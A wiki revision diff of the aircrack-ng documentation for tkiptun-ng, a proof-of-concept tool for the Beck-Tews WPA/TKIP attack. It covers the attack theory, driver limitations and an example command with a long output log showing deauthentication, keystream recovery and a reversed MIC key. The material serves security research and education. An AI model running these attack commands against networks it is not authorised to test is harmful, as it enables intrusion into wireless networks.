User Tools

Site Tools


tkiptun-ng

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
tkiptun-ng [2008/11/09 22:54]
mister_x Cosmetic changes
tkiptun-ng [2009/09/27 16:01] (current)
darkaudax Updated to reflect v1.0
Line 3: Line 3:
 ===== Description ===== ===== Description =====
  
-NOTE: This documention ​is still under development. ​ Please check back on a regular basis to obtain the latest updates. ​ If you have any feedback on the documentation,​ please post your comments to the [[http://​forum.tinyshell.be|Forum]].+NOTE: This documentation ​is still under development. ​ Please check back on a regular basis to obtain the latest updates. ​ If you have any feedback on the documentation,​ please post your comments to the [[http://​forum.aircrack-ng.org|Forum]].
  
-NOTE: The tkiptun-ng ​SVN version ​is not fully working.  ​working ​version will be released shortly.+**IMPORTANT ​NOTE:** The tkiptun-ng ​included in v1.0 is not fully working.  ​The final attack phase is not yet implemented. ​ The other portions are working ​with the ieee80211 drivers for RT73 and RTL8187L chipsets. ​ The madwifi-ng driver is definitely broken and is known to completely fail.  tkiptun-ng may work with other drivers but has not been tested so your mileage may vary.
  
 Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS.  He worked with Erik Tews (who created PTW attack) for a conference in [[http://​pacsec.jp/​|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA". Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS.  He worked with Erik Tews (who created PTW attack) for a conference in [[http://​pacsec.jp/​|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA".
  
-Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack. ​ This attack is described in the paper, [[http://​dl.aircrack-ng.org/​breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews.  The paper describes advanced attacks on WEP and the first practical attack on WPA.  An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article [[http://​arstechnica.com/​articles/paedia/​wpa-cracked.ars/​|Battered,​ but not broken: understanding the WPA crack]] by Glenn Fleishman.+Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack. ​ This attack is described in the paper, [[http://​dl.aircrack-ng.org/​breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews.  The paper describes advanced attacks on WEP and the first practical attack on WPA.  An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article [[http://​arstechnica.com/​security/news/​2008/​11/​wpa-cracked.ars/​|Battered,​ but not broken: understanding the WPA crack]] by Glenn Fleishman.
  
 Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check). ​ This is done via [[chopchoptheory|chopchop]]-type method. ​ Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated. Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check). ​ This is done via [[chopchoptheory|chopchop]]-type method. ​ Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated.
Line 15: Line 15:
 At this point, tkiptun-ng has recovered the MIC key  and knows a keystram for access point to client communication. ​ Subsequently,​ using the XOR file, you can create new packets and inject them.  The creation and injection are done using the other aircrack-ng suite tools. At this point, tkiptun-ng has recovered the MIC key  and knows a keystram for access point to client communication. ​ Subsequently,​ using the XOR file, you can create new packets and inject them.  The creation and injection are done using the other aircrack-ng suite tools.
  
-Please remember this is an extremely advanced attack. ​ You require ​advanced linux and aircrack-ng skills to use this tool.  DO NOT EXPECT support unless you can demonstrate you have these skills. ​ Novices will NOT BE SUPPORTED.+[[http://​download.aircrack-ng.org/​wiki-files/​doc/​tkip_master.pdf|Cryptanalysis of IEEE 802.11i TKIP]] by Finn Michael Halvorsen and Olav Haugen, June 2009 provides an excellent detailed description of how tkiptun-ng works. ​ As well, their paper includes detailed descriptions of many other attacks against WEP/​WPA/​WPA2. 
 + 
 +Please remember this is an extremely advanced attack. ​ You must possess ​advanced linux and aircrack-ng skills to use this tool.  DO NOT EXPECT support unless you can demonstrate you have these skills. ​ Novices will NOT BE SUPPORTED.
  
  
Line 29: Line 31:
 ===== Specific Requirements ===== ===== Specific Requirements =====
  
-The network card MAC address ​that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking.+The network card MAC address used by tkiptun-ng needs to be set to the MAC address of the client you are attacking. 
  
  
Line 40: Line 43:
  
 **Answer:** \\ **Answer:** \\
-It is done for debugging reasons. ​ First, so  that the temporal keys in tkiptun can be calculated.  ​Seocnd, check them against the calculated values from the plaintext packet.+It is done for debugging reasons. ​ First, so  that the temporal keys in tkiptun can be calculated.  ​Second, check them against the calculated values from the plaintext packet.
  
 Another reason, is to check if the AP/client reuses the nonces after a mic shutdown. Another reason, is to check if the AP/client reuses the nonces after a mic shutdown.
Line 88: Line 91:
 The example below is incomplete but it gives some idea of how it looks. The example below is incomplete but it gives some idea of how it looks.
  
-Input: tkiptun-ng ​ -h 00:​0F:​B5:​AB:​CB:​9D -a 00:​14:​6C:​7E:​40:​80 -m 80 -n 100 ath0+Input: 
 + 
 +   tkiptun-ng -h 00:​0F:​B5:​AB:​CB:​9D -a 00:​14:​6C:​7E:​40:​80 -m 80 -n 100 rausb0 ​
  
 Output: Output:
  
-  Blub 2:38 E6 38 1C 24 15 1C CF +   The interface MAC (00:​0E:​2E:​C5:​81:​D3) doesn'​t match the specified MAC (-h). 
-  Blub 1:17 DD 0D 69 1D C3 1F EE +        ifconfig rausb0 hw ether 00:​0F:​B5:​AB:​CB:​9D 
-  Blub 3:29 31 79 E7 E6 CF 8D 5E +   Blub 2:38 E6 38 1C 24 15 1C CF  
-  14:48:00  ​Michael Test: Successful +   ​Blub 1:17 DD 0D 69 1D C3 1F EE  
-  14:48:00  ​Waiting for beacon frame (BSSID: 00:​14:​6C:​7E:​40:​80) on channel 9 +   ​Blub 3:29 31 79 E7 E6 CF 8D 5E  
-  14:48:00  Found specified AP +   15:06:48  Michael Test: Successful 
-  14:​48:​00 ​ Sending 4 directed DeAuth. STMAC: [00:​0F:​B5:​AB:​CB:​9D] [ 2ACKs] +   15:06:48  Waiting for beacon frame (BSSID: 00:​14:​6C:​7E:​40:​80) on channel 9 
-  14:48:02  WPA handshake: 00:​14:​6C:​7E:​40:​80 captured +   15:06:48  Found specified AP 
-  14:48:02  ​Waiting for an ARP packet coming from the Client... +   15:06:48  ​Sending 4 directed DeAuth. STMAC[00:​0F:​B5:​AB:​CB:​9D] [ 0| 0 ACKs] 
-  Saving chosen packet in replay_src-1109-144822.cap +   ​15:​06:​54 ​ ​Sending 4 directed DeAuth. STMAC: [00:​0F:​B5:​AB:​CB:​9D] [ 0ACKs] 
-  14:48:22  ​Waiting for an ARP response packet coming from the AP... +   15:06:56  WPA handshake: 00:​14:​6C:​7E:​40:​80 captured 
-  Saving chosen packet in replay_src-1109-144822.cap +   15:06:56  ​Waiting for an ARP packet coming from the Client... 
-  14:48:22  Got the answer! +   ​Saving chosen packet in replay_src-0305-150705.cap 
-  14:48:22  ​Waiting ​seconds to let encrypted EAPOL frames pass without interfering. +   15:07:05  ​Waiting for an ARP response packet coming from the AP... 
-   +   ​Saving chosen packet in replay_src-0305-150705.cap 
-  ​Sent  40 packets, current guess: 27..+   15:07:05  Got the answer! 
 +   15:07:05  ​Waiting ​10 seconds to let encrypted EAPOL frames pass without interfering. 
 +    
 +   ​15:​07:​25 ​ Offset ​  99 ( 0% done) | xor = B3 | pt = D3 |  103 frames written in 84468ms 
 +   15:​08:​32 ​ Offset ​  98 ( 1% done) | xor = AE | pt = 80 |   64 frames written in 52489ms 
 +   ​15:​09:​45 ​ Offset ​  97 ( 3% done) | xor = DE | pt = C8 |  131 frames written in 107407ms 
 +   15:11:05  Offset ​  96 ( 5% done) | xor = 5A | pt = 7A |  191 frames written in 156619ms 
 +   ​15:​12:​07 ​ Offset ​  95 ( 6% done) | xor = 27 | pt = 02 |   21 frames written in 17221ms 
 +   ​15:​13:​11 ​ Offset ​  94 ( 8% done) | xor = D8 | pt = AB |   41 frames written in 33625ms 
 +   ​15:​14:​12 ​ Offset ​  93 (10% done) | xor = 94 | pt = 62 |   13 frames written in 10666ms 
 +   ​15:​15:​24 ​ Offset ​  92 (11% done) | xor = DF | pt = 68 |  112 frames written in 91829ms 
 +   Looks like mic failure report was not detectedWaiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​18:​13 ​ Offset ​  91 (13% done) | xor = A1 | pt = E1 |  477 frames written in 391139ms 
 +   ​15:​19:​32 ​ Offset ​  90 (15% done) | xor = 5F | pt = B2 |  186 frames written in 152520ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​22:​09 ​ Offset ​  89 (16% done) | xor = 9C | pt = 77 |  360 frames written in 295200ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​26:​10 ​ Offset ​  88 (18% done) | xor = 0D | pt = 3E |  598 frames written in 490361ms 
 +   ​15:​27:​33 ​ Offset ​  87 (20% done) | xor = 8C | pt = 00 |  230 frames written in 188603ms 
 +   ​15:​28:​38 ​ Offset ​  86 (21% done) | xor = 67 | pt = 00 |   47 frames written in 38537ms 
 +   ​15:​29:​53 ​ Offset ​  85 (23% done) | xor = AD | pt = 00 |  146 frames written in 119720ms 
 +   ​15:​31:​16 ​ Offset ​  84 (25% done) | xor = A3 | pt = 00 |  220 frames written in 180401ms 
 +   ​15:​32:​23 ​ Offset ​  83 (26% done) | xor = 28 | pt = 00 |   75 frames written in 61499ms 
 +   ​15:​33:​38 ​ Offset ​  82 (28% done) | xor = 7C | pt = 00 |  141 frames written in 115619ms 
 +   ​15:​34:​40 ​ Offset ​  81 (30% done) | xor = 02 | pt = 00 |   19 frames written in 15584ms 
 +   ​15:​35:​57 ​ Offset ​  80 (31% done) | xor = C9 | pt = 00 |  171 frames written in 140221ms 
 +   ​15:​37:​13 ​ Offset ​  79 (33% done) | xor = 38 | pt = 00 |  148 frames written in 121364ms 
 +   ​15:​38:​21 ​ Offset ​  78 (35% done) | xor = 71 | pt = 00 |   84 frames written in 68872ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​40:​55 ​ Offset ​  77 (36% done) | xor = 8E | pt = 00 |  328 frames written in 268974ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​43:​31 ​ Offset ​  76 (38% done) | xor = 38 | pt = 00 |  355 frames written in 291086ms 
 +   ​15:​44:​37 ​ Offset ​  75 (40% done) | xor = 79 | pt = 00 |   61 frames written in 50021ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​47:​05 ​ Offset ​  74 (41% done) | xor = 59 | pt = 00 |  269 frames written in 220581ms 
 +   ​15:​48:​30 ​ Offset ​  73 (43% done) | xor = 14 | pt = 00 |  249 frames written in 204178ms 
 +   ​15:​49:​49 ​ Offset ​  72 (45% done) | xor = 9A | pt = 00 |  183 frames written in 150059ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​52:​32 ​ Offset ​  71 (46% done) | xor = 03 | pt = 00 |  420 frames written in 344400ms 
 +   ​15:​53:​57 ​ Offset ​  70 (48% done) | xor = 0E | pt = 00 |  239 frames written in 195980ms 
 +   ​Sleeping for 60 seconds.36 bytes still unknown 
 +   ARP Reply 
 +   ​Checking 192.168.x.y 
 +   ​15:​54:​11 ​ Reversed MIC Key (FromDS): C3:​95:​10:​04:​8F:​8D:​6C:​66 
 +    
 +   ​Saving plaintext in replay_dec-0305-155411.cap 
 +   ​Saving keystream in replay_dec-0305-155411.xor 
 +   ​15:​54:​11 ​  
 +   ​Completed in 2816s (0.02 bytes/s) 
 +    
 +   ​15:​54:​11 ​ AP MAC: 00:​40:​F4:​77:​F0:​9B IP: 192.168.21.42 
 +   ​15:​54:​11 ​ Client MAC: 00:​0F:​B5:​AB:​CB:​9D IP: 192.168.21.112 
 +   ​15:​54:​11 ​ Sent encrypted tkip ARP request to the client. 
 +   ​15:​54:​11 ​ Wait for the mic countermeasure timeout of 60 seconds.
  
  
tkiptun-ng.1226267647.txt.gz · Last modified: 2008/11/09 22:54 by mister_x